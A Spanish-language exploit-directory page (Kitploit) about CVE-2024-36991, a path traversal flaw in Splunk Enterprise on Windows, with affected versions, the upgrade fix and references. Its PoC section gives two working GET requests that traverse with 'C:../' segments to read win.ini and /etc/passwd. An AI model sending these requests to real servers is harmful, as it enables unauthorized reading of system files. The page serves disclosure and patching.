Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-36991 — Recorrido de ruta en el endpoint "/Modules/Messaging/" de Splunk Enterprise en Windows | Kitploit
Herramientas/GitHubGitHub/mr-xn/cve-2024-36991
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubmr-xn/cve-2024-36991

CVE-2024-36991

Recorrido de ruta en el endpoint "/Modules/Messaging/" de Splunk Enterprise en Windows

Ver Repositorio
911hace 2 añosAún no revisado
Sitio web

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-36991

Path Traversal en el endpoint “/Modules/Messaging/” en Splunk Enterprise en Windows

En versiones de Splunk Enterprise anteriores a 9.2.2, 9.1.5 y 9.0.10, un atacante podría realizar un path traversal en el endpoint /modules/messaging/ en Splunk Enterprise en Windows.

La vulnerabilidad existe porque la función Python os.path.join elimina la letra de unidad de los tokens de ruta si la unidad en el token coincide con la unidad en la ruta construida.

Esta vulnerabilidad solo debería afectar a Splunk Enterprise en Windows.

POC

root@kitploit:~
GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../Windows/win.ini
GET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd

Afectado

Afectado desde 9.2 anterior a 9.2.2

Afectado desde 9.1 anterior a 9.1.5

Afectado desde 9.0 anterior a 9.0.10

Solución

Actualice Splunk Enterprise a las versiones 9.2.2, 9.1.5 y 9.0.10, o superiores.

Créditos

Danylo Dmytriiev (DDV_UA)

Referencias

  • https://advisory.splunk.com/advisories/SVD-2024-0711
  • https://www.cve.org/CVERecord?id=CVE-2024-36991
Descargar herramienta